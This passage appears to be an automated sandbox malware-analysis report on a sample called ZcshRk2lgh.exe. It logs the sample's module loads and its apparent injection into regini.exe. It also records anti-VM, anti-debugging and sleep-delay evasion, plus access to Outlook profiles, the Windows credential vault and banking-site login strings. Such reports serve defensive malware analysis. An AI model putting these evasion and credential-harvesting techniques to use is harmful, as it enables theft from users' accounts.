                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: ZcshRk2lgh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ZcshRk2lgh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EbjRcLZjak.exe, 0000000C.00000000.1551853417.0000000000A1E000.00000002.00000001.01000000.0000000D.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3092131327.0000000000A1E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: ZcshRk2lgh.exe, 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1639130757.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1641179587.000000000329A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ZcshRk2lgh.exe, ZcshRk2lgh.exe, 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1639130757.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1641179587.000000000329A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094328728.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094328728.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_02A54659 push edx; retn 0002h0_2_02A5465A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_02A5478F push esi; retn 0002h0_2_02A54792
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_02A5AB71 pushfd ; retn 0002h0_2_02A5AB72
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_02A5AD3A push edx; ret 0_2_02A5AD3B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_02A55318 pushfd ; ret 0_2_02A55332
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_0719147A push cs; ret 0_2_07191486
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_07192358 push es; ret 0_2_07192366
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 0_2_07190AB2 push cs; ret 0_2_07190AC6
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0040D066 push cs; retf 11_2_0040D068
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_00416123 push ecx; iretd 11_2_00416145
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0041692E push eax; ret 11_2_00416930
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_004031F0 push eax; ret 11_2_004031F2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0040D192 push 32D5BE83h; retf 11_2_0040D19A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_004082F0 push cs; ret 11_2_004082FD
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_004192F0 pushad ; retf 11_2_004192F2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0040D3DF push edx; retf 11_2_0040D3E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A09AD push ecx; mov dword ptr [esp], ecx11_2_014A09B6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034709AD push ecx; mov dword ptr [esp], ecx13_2_034709B6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009260FD pushad ; retf 13_2_009260FF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009306C7 push edx; iretd 13_2_009306C8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009306EF push ebp; ret 13_2_009306FB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_00922F30 push ecx; iretd 13_2_00922F52
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009150FD push cs; ret 13_2_0091510A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0092373B push eax; ret 13_2_0092373D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327C263 push edi; retf 13_2_0327C265
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327F1FA push 17DCBDD3h; retf 13_2_0327F1FF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327F64E push 48B9A3D6h; iretd 13_2_0327F653
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327451D push edi; iretd 13_2_0327453B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327654A push ds; ret 13_2_03276549
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_032764AB push ds; ret 13_2_03276549
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_032764B8 push ds; ret 13_2_03276549
                Source: ZcshRk2lgh.exeStatic PE information: section name: .text entropy: 7.724492265281776
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: ZcshRk2lgh.exe PID: 6340, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMemory allocated: 4C50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMemory allocated: 89B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMemory allocated: 7440000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMemory allocated: 99B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeMemory allocated: A9B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E096E rdtsc 11_2_014E096E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\regini.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe TID: 6536Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 2044Thread sleep count: 40 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 2044Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe TID: 316Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe TID: 316Thread sleep time: -37500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0092C8D0 FindFirstFileW,FindNextFileW,FindClose,13_2_0092C8D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr'U
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CDYNVMware20,11696492231p
                Source: 7046-nn1K.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 7046-nn1K.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 7046-nn1K.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 7046-nn1K.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 7046-nn1K.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 7046-nn1K.13.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 7046-nn1K.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 7046-nn1K.13.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 7046-nn1K.13.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 7046-nn1K.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rokers - EU WestVMware20
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696498H
                Source: 7046-nn1K.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 7046-nn1K.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: firefox.exe, 00000010.00000002.1935460736.0000028C2573C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                Source: 7046-nn1K.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 7046-nn1K.13.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ist test formVMware20,11pI
                Source: 7046-nn1K.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re.comVMware20,116964922@I
                Source: 7046-nn1K.13.drBinary or memory string: discord.comVMware20,11696492231f
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: alstudio.comVMware20,116PI
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agement pageVMware20,11696492231
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agement pageVMware20,116964922315
                Source: 7046-nn1K.13.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 7046-nn1K.13.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 7046-nn1K.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 7046-nn1K.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 7046-nn1K.13.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 7046-nn1K.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ctivebrokers.comVMware20,11696492231}
                Source: 7046-nn1K.13.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 7046-nn1K.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware`I
                Source: 7046-nn1K.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169649
                Source: EbjRcLZjak.exe, 0000000E.00000002.3094678225.0000000000F7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                Source: 7046-nn1K.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 7046-nn1K.13.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 7046-nn1K.13.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 7046-nn1K.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 7046-nn1K.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 7046-nn1K.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E096E rdtsc 11_2_014E096E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_00417A73 LdrLoadDll,11_2_00417A73
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01538158 mov eax, dword ptr fs:[00000030h]11_2_01538158
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01534144 mov eax, dword ptr fs:[00000030h]11_2_01534144
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01534144 mov eax, dword ptr fs:[00000030h]11_2_01534144
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01534144 mov ecx, dword ptr fs:[00000030h]11_2_01534144
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01534144 mov eax, dword ptr fs:[00000030h]11_2_01534144
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01534144 mov eax, dword ptr fs:[00000030h]11_2_01534144
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6154 mov eax, dword ptr fs:[00000030h]11_2_014A6154
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6154 mov eax, dword ptr fs:[00000030h]11_2_014A6154
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149C156 mov eax, dword ptr fs:[00000030h]11_2_0149C156
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01560115 mov eax, dword ptr fs:[00000030h]11_2_01560115
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154A118 mov ecx, dword ptr fs:[00000030h]11_2_0154A118
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154A118 mov eax, dword ptr fs:[00000030h]11_2_0154A118
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154A118 mov eax, dword ptr fs:[00000030h]11_2_0154A118
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154A118 mov eax, dword ptr fs:[00000030h]11_2_0154A118
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov eax, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov ecx, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov eax, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov eax, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov ecx, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov eax, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov eax, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov ecx, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov eax, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E10E mov ecx, dword ptr fs:[00000030h]11_2_0154E10E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D0124 mov eax, dword ptr fs:[00000030h]11_2_014D0124
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E1D0 mov eax, dword ptr fs:[00000030h]11_2_0151E1D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E1D0 mov eax, dword ptr fs:[00000030h]11_2_0151E1D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E1D0 mov ecx, dword ptr fs:[00000030h]11_2_0151E1D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E1D0 mov eax, dword ptr fs:[00000030h]11_2_0151E1D0
